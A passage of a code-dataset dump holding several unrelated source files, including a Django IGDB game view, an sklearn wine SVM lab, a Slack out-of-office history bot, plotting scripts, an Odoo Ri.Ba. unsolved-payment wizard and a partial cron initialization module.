limit 6;'\n headers = {'user-key': settings.IGDB_KEY}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n\n\n@api_view(['GET'])\ndef get_backdrop(request, guid):\n \"\"\"Gets the background image for the landing page.\n \n Makes a call to `https://api-v3.igdb.com/games`, with image-related fields\n only. The game the backdrop is selected from is randomly selected in the \n frontend.\n\n Args:\n guid: ID of the game.\n\n Returns:\n backdrop: a JSON object with the image IDs necessary for the backdrop.\n \"\"\"\n data = f'fields {backdrop_fields}; where id={guid};'\n headers = {'user-key': settings.IGDB_KEY}\n url = settings.IGDB_URL.format(endpoint='games')\n r = requests.post(url=url, data=data, headers=headers)\n\n return Response(r.json())\n","sub_path":"backend/games/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"346682975","text":"#! /usr/bin/env python3\n\n# implement SVM classification on scikit wine dataset\n\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\nimport sklearn.metrics as metrics\n\nwine = datasets.load_wine()\n\n# wine set has 3 classes of wine\n\n#print(wine.target_names)\n#print(wine.feature_names)\n\n# split into train and test sets, use 80% of data to train and 20% to test\nx_train, x_test, y_train, y_test = train_test_split(wine.data, wine.target, test_size=0.2)\n\n# make an SVM classifier using a linear kernel\nclassifier = svm.SVC(kernel='linear', )\n\n# fit model to our training data and make predictions on test set\nclassifier.fit(x_train, y_train)\npred = classifier.predict(x_test)\n\n# print classification report and accuracy of predictions\nprint('--- linear kernel results ---')\nprint(metrics.classification_report(y_test, pred))\nprint('accuracy:', metrics.accuracy_score(y_test, pred))\n\n# repeat using RBF kernel\nclassifier = svm.SVC(kernel='rbf', )\nclassifier.fit(x_train, y_train)\npred = classifier.predict(x_test)\n\nprint('--- RBF kernel results ---')\nprint(metrics.classification_report(y_test, pred))\nprint('accuracy', metrics.accuracy_score(y_test, pred))\n\n\n#plt.xlabel('Annual Income')\n#plt.ylabel('Spending Score')\n","sub_path":"source/lab3/lab_3_3.py","file_name":"lab_3_3.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"377344319","text":"import os\nimport requests\nimport json\nimport base64\nfrom flask import abort, Flask, jsonify, request\nfrom rq import Queue\nfrom oooWorker import conn\n\n\napp = Flask(__name__)\n\ndef IsRequestValid(request):\n isTokenValid = request.form['token'] == os.environ.get('VALID_TOKEN')\n isTeamIdValid = request.form['team_id'] == os.environ.get('TEAM_ID')\n\n return isTokenValid and isTeamIdValid\n\ndef GetChanellHistory(responseUrl, userId):\n oooHistoryString = \"\"\n BOT_TOKKEN = os.environ.get('BOT_TOKEN')\n OOO_CHANNEL_ID = os.environ.get('OOO_CHANNEL_ID')\n\n payload = {\"token\": BOT_TOKKEN, \"channel\": OOO_CHANNEL_ID}\n headers = {'content-type': 'application/x-www-form-urlencoded'}\n \n while True:\n response = requests.get('https://slack.com/api/conversations.history', params=payload, headers=headers)\n allDict = json.loads(response.text)\n \n for messageItem in allDict[\"messages\"]:\n if \"user\" in messageItem and messageItem[\"user\"] == userId:\n if \"thread_ts\" in messageItem:\n threadPayload = {\"token\": BOT_TOKKEN, \"channel\": OOO_CHANNEL_ID, \"ts\": messageItem[\"thread_ts\"]}\n threadResponse = requests.get('https://slack.com/api/conversations.replies', params=threadPayload, headers=headers)\n threadDict = json.loads(threadResponse.text)\n\n for threadItem in threadDict[\"messages\"]:\n if \"user\" in threadItem and threadItem[\"user\"] == userId:\n oooHistoryString = PrintItem(threadItem, oooHistoryString)\n\n else:\n oooHistoryString = PrintItem(messageItem, oooHistoryString)\n \n if allDict[\"has_more\"] == True:\n payload['cursor'] = allDict[\"response_metadata\"][\"next_cursor\"] \n else:\n break\n\n attachmentsDict = {}\n attachmentsDict['title'] = \"Here comes your OoO history.\"\n attachmentsDict['text'] = oooHistoryString\n\n SendMessageToSlack(attachmentsDict, responseUrl) \n \ndef PrintItem(messageItem, oooHistoryString):\n oooHistoryString += messageItem['text']\n oooHistoryString += \"\\n\\n\" \n return oooHistoryString\n\ndef SendMessageToSlack(attachment, url):\n payload = {}\n payload['text'] = 'Get OoO History'\n payload['attachments'] = []\n payload['attachments'].append(attachment)\n payload['response_type'] = 'ephemeral'\n\n payloadResult = json.dumps(payload);\n headers = {'Content-type': 'application/json', 'charset': 'UTF-8'}\n\n result = requests.post(url, data=payloadResult, headers=headers)\n print(result.text)\n\ndef QueingJob(request):\n print (\"QueingJob\")\n q = Queue(connection=conn)\n result = q.enqueue(GetChanellHistory, request.form['response_url'], request.form['user_id'])\n print(result)\n\n@app.route('/', methods=['POST'])\ndef OOOMe():\n if not IsRequestValid(request):\n abort(400)\n \n print (\"OOOME\")\n # GetChanellHistory(request.form['response_url'], request.form['user_id'])\n QueingJob(request)\n\n return jsonify(response_type='ephemeral', text=\"Check %s's ooo history:fast_parrot:\" % request.form['user_name']) \n\n# ooo channel id C4DRJAA0Y\n","sub_path":"oooChecker.py","file_name":"oooChecker.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"145861605","text":"#!/user/bin/env python3 -W ignore\nfrom pandas import DataFrame, read_csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport argparse\nimport sys\n## Define the default values\nparser = argparse.ArgumentParser()\nparser.add_argument('-csv' , action='store',dest='csvfile',help='path to csvfile first column x axis',type=str)\nparser.add_argument('-xlabel', action='store',dest='xlabel' ,help='label for the x axis',type=str)\nparser.add_argument('-ylabel', action='store',dest='ylabel' ,help='label for the y axis',type=str)\nparser.add_argument('-output', action='store',dest='output' ,help='name of the output file',type=str)\nparser.add_argument('-title', action='store' ,dest='title' ,help='title of the plot',type=str)\nresults = parser.parse_args()\n\nif not (results.csvfile): sys.exit(\"Error:csv file not defined\")\nif not (results.output): results.output = \"mylineplot\"\nif not (results.title): results.title = \"mytitle\"\nfile = open(results.csvfile,'r')\ndf = pd.read_csv(file)\n\n## Testing stuff\n#print(df)\n#print('Max', df['3x'].max())\n#print('Min', df['2x'].min())\n\nX = list(df)\nmyplot=df.plot(X[0],X[1:])\nmyplot.set_xlabel(results.xlabel)\nmyplot.set_ylabel(results.ylabel)\nplt.title(results.title)\nplt.savefig(results.output)\n","sub_path":"python/mylineplot.py","file_name":"mylineplot.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"553444158","text":"import json\n\nimport pandas as pd\nimport plotly\nimport plotly.graph_objs as go\n\n\ndef create_barchart_soureVeracite():\n\n pd.set_option('display.max_colwidth', -1)\n pd.set_option('display.max_columns', None)\n\n ##########################load df\n df_Source_labelTRUE = pd.read_csv('modules/df_Source_labelTRUE.csv', dtype={\"id1\": str, \"id2\": str, \"entity\": str}, header=0)\n df_Source_labelFALSE = pd.read_csv('modules/df_Source_labelFALSE.csv',dtype={\"id1\": str, \"id2\": str, \"entity\": str}, header=0)\n df_Source_labelOTHER = pd.read_csv('modules/df_Source_labelOTHER.csv',dtype={\"id1\": str, \"id2\": str, \"entity\": str}, header=0)\n df_Source_labelMIXTURE = pd.read_csv('modules/df_Source_labelMIXTURE.csv',dtype={\"id1\": str, \"id2\": str, \"entity\": str}, header=0)\n\n df_Source_labelTRUE_Distinct=list(set(df_Source_labelTRUE[\"source\"]))\n df_Source_labelFALSE_Distinct = list(set(df_Source_labelFALSE[\"source\"]))\n df_Source_labelOTHERE_Distinct = list(set(df_Source_labelOTHER[\"source\"]))\n df_Source_labelMIXTURE_Distinct = list(set(df_Source_labelMIXTURE[\"source\"]))\n\n dic={}\n for auteur in df_Source_labelOTHERE_Distinct:\n A = list(df_Source_labelTRUE['source']).count(auteur)\n B = list(df_Source_labelFALSE['source']).count(auteur)\n C = list(df_Source_labelOTHER['source']).count(auteur)\n D = list(df_Source_labelMIXTURE['source']).count(auteur)\n dic[auteur]=[A,B,C,D]\n\n labels = ['TRUE', 'FALSE', 'OTHER', 'MIXTURE']\n\n colors = ['blue', 'lightskyblue','red','yellow','green','black']\n\n\n data=[]\n i=0\n for key in dic.keys():\n trace0 = go.Bar(\n x=labels,\n y=dic[key],\n name=key,\n marker=dict(color=colors[i]))\n data.append(trace0)\n i=i+1\n\n\n layout = go.Layout(\n title='Means of item by claims',\n barmode='group'\n )\n\n barchart_nb_means_JSON22 = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n\n\n # print(piechart_labels_JSON)\n return barchart_nb_means_JSON22\n# create_barchart_soureVeracite()","sub_path":"modules/barchartsSourceVeracite.py","file_name":"barchartsSourceVeracite.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"47564035","text":"\n\n\nfrom Functions.Helpers import *\n\n\ndef fromGI(G, file, colorPalette):\n \"\"\"\n fromGI() function takes a converted (please check the format) GI object and initialize a networkx graph.\n\n - Requires an empty nx graph object, converted file location and a color colorPalette (see formats)\n - Returns number of each node class.\n\n \"\"\"\n\n nodeClassC = {}\n with open(file) as tsvfile:\n reader = csv.reader(tsvfile, delimiter='\\t')\n for row in reader:\n abNode = row[0]\n\n aNode = abNode.split(\",\")[0]\n aNodeClass = aNode.split(\".\")[0]\n aNode = aNode.split(\".\",maxsplit=1)[1]\n\n bNode = abNode.split(\",\")[1]\n bNodeClass = bNode.split(\".\")[0]\n bNode = bNode.split(\".\",maxsplit=1)[1]\n\n weight = row[1]\n fdr = row[2]\n\n weight = int(weight)\n fdr = float(fdr)\n\n G.add_node(aNode,\n color=colorPalette[aNodeClass],\n nodeClass=aNodeClass,\n logFC=0,\n Qval=0,\n nodeRange=(),\n index=0,\n nodeName=aNode,\n elm=[],\n tad=[],\n com=[],\n chr=[],\n subP=None,\n subE=None,\n subG=None,\n subT=None,\n subM=None)\n G.add_node(bNode,\n color=colorPalette[bNodeClass],\n nodeClass=bNodeClass,\n logFC=0,\n Qval=0,\n nodeRange=(),\n index=0,\n nodeName=bNode,\n elm=[],\n tad=[],\n com=[],\n chr=[],\n subP=None,\n subE=None, # Clasical enhancer promıter\n subG=None, # CRE => should have two first degree subGraph\n subT=None,\n subM=None)\n\n if (aNode, bNode) in G.edges:\n w2 = G.edges[(aNode, bNode)][\"weight\"]\n weight += w2\n G.edges[(aNode, bNode)][\"weight\"] = weight\n\n else:\n G.add_edge(aNode, bNode,\n weight=weight,\n fdr=fdr,\n edgeType={(aNodeClass, bNodeClass) : 0},\n color=\"#888888\",\n distance=\"\")\n\n\n if (not aNodeClass in nodeClassC.keys()):\n nodeClassC[aNodeClass] = 1\n elif (not bNodeClass in nodeClassC.keys()):\n nodeClassC[bNodeClass] = 1\n elif aNodeClass in nodeClassC.keys():\n nodeClassC[aNodeClass] += 1\n elif bNodeClass in nodeClassC.keys():\n nodeClassC[bNodeClass] += 1\n\n return nodeClassC\n\n\n\ndef fromGIup(L, U, upLvl=\"tad\",lwLvl=\"subG\"):\n \"\"\"\n This function connects differnt level of graphs with given combination upper level and lower level.\n\n - Levels are G -> T -> M -> C, based on genomic organization.\n - Each level represented by a graph object, and their nodes are DNA regions in genome.\n\n - While going up in the system corresponded subGraphs are entegrated to one upper level.\n - At the same time current lower level nodes get an attribution that their positions in upper levels.\n\n - For fully connected system, please run this code as followings:\n [0]: fromGIup(G, T, \"tad\", \"subG\")\n [1]: fromGIup(G, M, \"com\", \"subG\")\n [2]: fromGIup(G, C, \"chr\", \"subG\")\n\n [3]: fromGIup(T, M, \"com\", \"subT\")\n [4]: fromGIup(T, C, \"chr\", \"subT\")\n\n [5]: fromGIup(M, C, \"chr\", \"subM\")\n - Note that firstly each upper level in the system should get the lowest subGraph attribution, then system can be builded.\n\n \"\"\"\n\n Lbed = dict(L.nodes(data=\"nodeRange\"))\n\n Lbed = sortBed(Lbed)\n\n Ubed = dict(U.nodes(data=\"nodeRange\"))\n\n Ubed = sortBed(Ubed)\n\n Unodes = list(U.nodes())\n\n for node in Unodes:\n\n nodeRange = Ubed[node]\n nodeClass = U.nodes[node][\"nodeClass\"]\n\n nUp = rangesFromUpperRange(nodeRange[0], nodeRange[1], nodeRange[2], Lbed)\n\n n = [_[0] for _ in nUp]\n\n if len(n) == 0:\n U.remove_node(node)\n continue\n\n\n for nodeL in n:\n L.nodes[nodeL][upLvl] = node\n\n U.nodes[node][upLvl] = node\n\n l = L.subgraph(n).copy()\n\n U.nodes[node][lwLvl] = l\n","sub_path":"MainFunctions/GIFunctions.py","file_name":"GIFunctions.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"245838991","text":"# -*- coding: utf-8 -*-\n#\n#\n# Copyright (C) 2012 Agile Business Group sagl ()\n# Copyright (C) 2012 Domsense srl ()\n# Copyright (C) 2012 Associazione OpenERP Italia\n# ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published\n# by the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n#\n\nfrom openerp.osv import fields, orm\nfrom tools.translate import _\nimport netsvc\n\n\nclass riba_unsolved(orm.TransientModel):\n\n def _get_unsolved_journal_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'unsolved_journal_id', context=context)\n\n def _get_effects_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'acceptance_account_id', context=context)\n\n def _get_effects_amount(self, cr, uid, context=None):\n if context is None:\n context = {}\n if not context.get('active_id', False):\n return False\n return self.pool.get(\n 'riba.distinta.line'\n ).browse(cr, uid, context['active_id'], context=context).amount\n\n def _get_riba_bank_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'accreditation_account_id', context=context)\n\n def _get_overdue_effects_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'overdue_effects_account_id', context=context)\n\n def _get_bank_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'bank_account_id', context=context)\n\n def _get_bank_expense_account_id(self, cr, uid, context=None):\n return self.pool.get(\n 'riba.configurazione'\n ).get_default_value_by_distinta_line(\n cr, uid, 'protest_charge_account_id', context=context)\n\n _name = \"riba.unsolved\"\n _columns = {\n 'unsolved_journal_id': fields.many2one(\n 'account.journal', \"Unsolved journal\",\n domain=[('type', '=', 'bank')]),\n 'effects_account_id': fields.many2one(\n 'account.account', \"Effects account\",\n domain=[('type', '=', 'receivable')]),\n 'effects_amount': fields.float('Effects amount'),\n 'riba_bank_account_id': fields.many2one(\n 'account.account', \"Ri.Ba. bank account\"),\n 'riba_bank_amount': fields.float('Ri.Ba. bank amount'),\n 'overdue_effects_account_id': fields.many2one(\n 'account.account', \"Overdue Effects account\",\n domain=[('type', '=', 'receivable')]),\n 'overdue_effects_amount': fields.float('Overdue Effects amount'),\n 'bank_account_id': fields.many2one('account.account', \"Bank account\",\n domain=[(\n 'type', '=', 'liquidity')]),\n 'bank_amount': fields.float('Taken amount'),\n 'bank_expense_account_id': fields.many2one(\n 'account.account', \"Bank Expenses account\"),\n 'expense_amount': fields.float('Expenses amount'),\n }\n\n _defaults = {\n 'unsolved_journal_id': _get_unsolved_journal_id,\n 'effects_account_id': _get_effects_account_id,\n 'effects_amount': _get_effects_amount,\n 'riba_bank_account_id': _get_riba_bank_account_id,\n 'riba_bank_amount': _get_effects_amount,\n 'overdue_effects_account_id': _get_overdue_effects_account_id,\n 'overdue_effects_amount': _get_effects_amount,\n 'bank_account_id': _get_bank_account_id,\n 'bank_expense_account_id': _get_bank_expense_account_id,\n }\n\n def skip(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n wf_service = netsvc.LocalService(\"workflow\")\n active_id = context and context.get('active_id', False) or False\n if not active_id:\n raise orm.except_orm(_('Error'), _('No active ID found'))\n line_pool = self.pool.get('riba.distinta.line')\n line_pool.write(cr, uid, active_id,\n {'state': 'unsolved'}, context=context)\n wf_service.trg_validate(\n uid, 'riba.distinta', line_pool.browse(\n cr, uid, active_id).distinta_id.id, 'unsolved', cr)\n return {'type': 'ir.actions.act_window_close'}\n\n def create_move(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n wf_service = netsvc.LocalService(\"workflow\")\n active_id = context and context.get('active_id', False) or False\n if not active_id:\n raise orm.except_orm(_('Error'), _('No active ID found'))\n move_pool = self.pool.get('account.move')\n invoice_pool = self.pool.get('account.invoice')\n move_line_pool = self.pool.get('account.move.line')\n distinta_line = self.pool.get('riba.distinta.line').browse(\n cr, uid, active_id, context=context)\n wizard = self.browse(cr, uid, ids)[0]\n if (\n not wizard.unsolved_journal_id\n or not wizard.effects_account_id\n or not wizard.riba_bank_account_id\n or not wizard.overdue_effects_account_id\n or not wizard.bank_account_id\n or not wizard.bank_expense_account_id\n ):\n raise orm.except_orm(_('Error'), _('Every account is mandatory'))\n move_vals = {\n 'ref': _('Unsolved Ri.Ba. %s - line %s') % (\n distinta_line.distinta_id.name, distinta_line.sequence),\n 'journal_id': wizard.unsolved_journal_id.id,\n 'line_id': [\n (0, 0, {\n 'name': _('Effects'),\n 'account_id': wizard.effects_account_id.id,\n 'partner_id': distinta_line.partner_id.id,\n 'credit': wizard.effects_amount,\n 'debit': 0.0,\n }),\n (0, 0, {\n 'name': _('Ri.Ba. Bank'),\n 'account_id': wizard.riba_bank_account_id.id,\n 'debit': wizard.riba_bank_amount,\n 'credit': 0.0,\n }),\n (0, 0, {\n 'name': _('Overdue Effects'),\n 'account_id': wizard.overdue_effects_account_id.id,\n 'debit': wizard.overdue_effects_amount,\n 'credit': 0.0,\n 'partner_id': distinta_line.partner_id.id,\n 'date_maturity': distinta_line.due_date,\n }),\n (0, 0, {\n 'name': _('Bank'),\n 'account_id': wizard.bank_account_id.id,\n 'credit': wizard.bank_amount,\n 'debit': 0.0,\n }),\n (0, 0, {\n 'name': _('Expenses'),\n 'account_id': wizard.bank_expense_account_id.id,\n 'debit': wizard.expense_amount,\n 'credit': 0.0,\n }),\n ]\n }\n move_id = move_pool.create(cr, uid, move_vals, context=context)\n\n to_be_reconciled = []\n for move_line in move_pool.browse(\n cr, uid, move_id, context=context\n ).line_id:\n if move_line.account_id.id == wizard.overdue_effects_account_id.id:\n for riba_move_line in distinta_line.move_line_ids:\n invoice_ids = []\n if riba_move_line.move_line_id.invoice:\n invoice_ids = [riba_move_line.move_line_id.invoice.id]\n elif riba_move_line.move_line_id.unsolved_invoice_ids:\n invoice_ids = [\n i.id for i in\n riba_move_line.move_line_id.unsolved_invoice_ids\n ]\n invoice_pool.write(cr, uid, invoice_ids, {\n 'unsolved_move_line_ids': [(4, move_line.id)],\n }, context=context)\n if move_line.account_id.id == wizard.effects_account_id.id:\n to_be_reconciled.append(move_line.id)\n for acceptance_move_line in distinta_line.acceptance_move_id.line_id:\n if (\n acceptance_move_line.account_id.id\n == wizard.effects_account_id.id\n ):\n to_be_reconciled.append(acceptance_move_line.id)\n\n distinta_line.write({\n 'unsolved_move_id': move_id,\n 'state': 'unsolved',\n })\n move_line_pool.reconcile_partial(\n cr, uid, to_be_reconciled, context=context)\n wf_service.trg_validate(\n uid, 'riba.distinta', distinta_line.distinta_id.id, 'unsolved', cr)\n return {\n 'name': _('Unsolved Entry'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'account.move',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'res_id': move_id or False,\n }\n","sub_path":"l10n_it_ricevute_bancarie/wizard/wizard_unsolved.py","file_name":"wizard_unsolved.py","file_ext":"py","file_size_in_byte":10000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"643795082","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n if len(needle) == 0: return 0\n for index in range(0, len(haystack)):\n if (len(needle) + index > len(haystack)): return -1\n indexToReturn = index\n for i in range(0, len(needle)):\n if (haystack[index+i] != needle[i]):\n indexToReturn = -1\n break\n if indexToReturn != -1: return indexToReturn\n return -1\n\ns = Solution()\nassert s.strStr(\"hello\", \"\") == 0, \"Should be 0\"\nassert s.strStr(\"hello\", \"ll\") == 2, \"Should be 2\"\nassert s.strStr(\"aaa\", \"bba\") == -1, \"Should be -1\"\nassert s.strStr(\"\", \"bba\") == -1, \"Should be -1\"\nassert s.strStr(\"aaa\", \"aaaa\") == -1, \"Should be -1\"","sub_path":"src/leet/ImplementStrStrQ28.py","file_name":"ImplementStrStrQ28.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"33555570","text":"from django.urls import path\r\nfrom . import views\r\n\r\napp_name = 'st_pauls_school'\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('teacher/', views.Teachers, name = 'teacher'),\r\n path('teacher/dashboard/', views.TeacherDasboard, name = 'teacherdashboard'),\r\n path('student/', views.Students, name = 'student'),\r\n path('student/dashboard/', views.StudentDasboard, name = 'studentdashboard'),\r\n]\r\n\r\n","sub_path":"college_platform/st_pauls_school/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"70634868","text":"# -*- coding: utf-8 -*-\n\n# ██╗███╗ ██╗██╗████████╗██╗ █████╗ ██╗ ██╗███████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗\n# ██║████╗ ██║██║╚══██╔══╝██║██╔══██╗██║ ██║╚══███╔╝██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║\n# ██║██╔██╗ ██║██║ ██║ ██║███████║██║ ██║ ███╔╝ ███████║ ██║ ██║██║ ██║██╔██╗ ██║\n# ██║██║╚██╗██║██║ ██║ ██║██╔══██║██║ ██║ ███╔╝ ██╔══██║ ██║ ██║██║ ██║██║╚██╗██║\n# ██║██║ ╚████║██║ ██║ ██║██║ ██║███████╗██║███████╗██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║\n# ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝\n\n# Description: contains initialization process. Initialization means synchronization from start date\n\n# ======================================================== DEPENDENCIES\n\n# Native:\nimport sys\nfrom datetime import datetime as Datetime\nfrom datetime import date as Date\nimport multiprocessing\n\n# Pauli SDK dependency:\nfrom pauli_sdk.Modules import constants as _Pauli_Constants\nfrom pauli_sdk.Modules import helper as _Pauli_Helper\nfrom pauli_sdk.Classes.response import Error\nfrom pauli_sdk.Classes.response import Already_Handled_Exception\n\n# Development:\nfrom General import constants as _Constants\nfrom General import utilities as _Utilities\nfrom General import firmware as _Firmware\n\nfrom Processes.Initialization import config as _Initialization_config\nfrom Processes.Initialization import locals as _Locals\nINITIALIZATION_CONFIG = _Initialization_config.initialization\nINITIALIZATION_LOGGING_CONFIG = INITIALIZATION_CONFIG['logging']\n\n# ======================================================== CODE \n\nLOG_INDENT = _Constants.LOG_INDENT\nINITIALIZATION_PROCESS_NAME = 'INITIALIZATION'\n\n# Cron logger (Main):\ncron_logger = _Utilities.get_logger('cron')\ninitialization_logger = _Utilities.get_logger(INITIALIZATION_LOGGING_CONFIG['process_file_name'])\n\n# Notes:\n# cron_logger -> log at cron main level execution\n# initialization_logger -> log at cron-initialization process level execution\n# process_logger -> log at cron-init-n subprocess level execution (n subprocesses every one has its log file)\n\n# Each initialization thread (i.e. subprocess) executes this function. Contains initialization process for a set of taxpayers\ndef excute_initialization(taxpayers,shared_variables):# Taxpayers are the ones splitted for this specific subprocess\n\ttry:\n\t\t# Shared variables:\n\t\tcurrent_taxpayer = shared_variables['current_taxpayer']\n\t\ttotal_taxpayers = shared_variables['total_taxpayers']\n\t\tcurrent_table_row = shared_variables['current_table_row']\n\t\tforcing_execution = shared_variables['forcing_execution']\n\t\tprocess_params = shared_variables['process_params']\n\t\tforcing_period = False\n\t\tif 'year' in process_params:\n\t\t\tforcing_period = True\n\t\tlock = shared_variables['lock']\n\t\t# Process:\n\t\tprocess_name = multiprocessing.current_process().name\n\t\ttotal_taxpayers_for_this_subprocess = len(taxpayers)\n\t\t# Process logger:\n\t\tprocess_logger = _Utilities.get_subprocess_logger(process_name,INITIALIZATION_LOGGING_CONFIG,logger=initialization_logger)\n\t\tprocess_logger.info(' ')\n\t\tprocess_logger.info(' ')\n\t\tprocess_logger.info(' ')\n\t\tprocess_logger.info(' ')\n\t\tprocess_logger.info(_Constants.LOG_SEPARATOR)\n\t\tprocess_logger.info(INITIALIZATION_PROCESS_NAME + ' - ' + process_name.upper())\n\t\ttaxpayers_initialized_counter = 0\n\t\tprocess_logger.info(LOG_INDENT + 'Forcing execution: ' + str(forcing_execution))\n\t\tprocess_logger.info(LOG_INDENT + 'Taxpayers: ' + str(total_taxpayers_for_this_subprocess))\n\t\tfor taxpayer in taxpayers:\n\t\t\tif not forcing_execution:\n\t\t\t\t_Utilities.update_current_taxpayer(_Constants.INITIALIZATION,taxpayer['identifier'],current_taxpayer.value+1,logger=process_logger)\n\t\t\tpercentage_of_initialization_done = _Utilities.get_process_percentage_done(taxpayers_initialized_counter,total_taxpayers_for_this_subprocess)\n\t\t\ttaxpayers_initialized_counter = taxpayers_initialized_counter + 1# Specific taxpayers (this thread's counter)\n\t\t\tprocess_logger.info(LOG_INDENT + '-> (' + str(taxpayers_initialized_counter) + '/' + str(total_taxpayers_for_this_subprocess) + ') ' + taxpayer['identifier'] + ' --- ' + percentage_of_initialization_done)\n\t\t\tinitialization_execution_data = excute_initialization_for_taxpayer(forcing_period=forcing_period,forcing_execution=forcing_execution,taxpayer=taxpayer,process_logger=process_logger,process_params=process_params)\n\t\t\twith lock:\n\t\t\t\tcurrent_taxpayer.value = current_taxpayer.value + 1\n\t\t\tcurrent_date = Datetime.now()\n\t\t\tinitialization_execution_log = {\n\t\t\t\t'date' : str(current_date)[:10],\n\t\t\t\t'hour' : str(current_date)[10:-7],\n\t\t\t\t'process_name' : process_name,\n\t\t\t\t'current_taxpayer_index' : current_taxpayer.value,\n\t\t\t\t'total_taxpayers' : total_taxpayers.value,\n\t\t\t\t'identifier' : taxpayer['identifier'],\n\t\t\t\t'new' : initialization_execution_data['new'],\n\t\t\t\t'stored' : initialization_execution_data['stored'],\n\t\t\t\t'year_initialized' : initialization_execution_data['year_initialized'],\n\t\t\t\t'month_initialized' : initialization_execution_data['month_initialized'],\n\t\t\t\t'percentage_initialized' : initialization_execution_data['percentage_initialized'],\n\t\t\t\t'initialized' : initialization_execution_data['initialized'],\n\t\t\t\t# 'new' : 0,\n\t\t\t\t# 'stored' : 0,\n\t\t\t\t# 'year_initialized' : '2015',\n\t\t\t\t# 'month_initialized' : '02',\n\t\t\t\t# 'percentage_initialized' : 0,\n\t\t\t\t'lock' : lock,\n\t\t\t\t'current_table_row' : current_table_row\n\t\t\t}# End of initialization_execution_log\n\t\t\tif initialization_execution_log['current_taxpayer_index'] == initialization_execution_log['total_taxpayers']:\n\t\t\t\tinitialization_execution_log['end'] = True\n\t\t\t\tinitialization_execution_log['end_message'] = INITIALIZATION_PROCESS_NAME + ' DONE SUCCESSFULLY \\\\0/'\n\t\t\telse:\n\t\t\t\tinitialization_execution_log['end'] = False\n\t\t\t_Locals.log_initiliazation_thread_logs_at_initialization_main_logs(initialization_execution_log=initialization_execution_log,initialization_logger=initialization_logger,cron_logger=cron_logger)\n\t\t\tif forcing_period or ('avoid_iteration' in initialization_execution_data and initialization_execution_data['avoid_iteration'] == True):\n\t\t\t\tprocess_logger.info(2*LOG_INDENT + 'NOT Updating initialization data for taxpayer ... ')\n\t\t\telse:\n\t\t\t\tprocess_logger.info(2*LOG_INDENT + 'Updating initialization data for taxpayer ... ')\n\t\t\t\t_Locals.update_initialization_data_for_taxpayer(taxpayer,initialization_execution_log,logger=process_logger)\n\t\t\tprocess_logger.info(2*LOG_INDENT + 'Synchronized successfully. Logged at SL1 main logs')\n\t\tprocess_logger.info(INITIALIZATION_PROCESS_NAME + ' - ' + process_name.upper() + ' DONE SUCCESSFULLY \\0/')\n\t\tprocess_logger.info(_Constants.LOG_SEPARATOR)\n\t\treturn 'OK'\n\texcept Already_Handled_Exception as already_handled_exception:\n\t\traise already_handled_exception\n\texcept Exception as e:\n\t\tinitialization_logger.critical(e.message)\n\t\talready_handled_exception = Already_Handled_Exception(e.message)\n\t\traise already_handled_exception\n\n# Contains initialization process for a single taxpayer:\ndef excute_initialization_for_taxpayer(forcing_execution=False,forcing_period=False,taxpayer=None,process_logger=None,process_params=None):\n\ttry:\n\t\tprocess_logger.info(2*LOG_INDENT + 'Forcing period: ' + str(forcing_period))\n\t\tinitialization_data = _Locals.get_initialization_data(taxpayer,logger=process_logger,process_params=process_params)\n\t\tinitialized = initialization_data['initialized']\n\t\tif 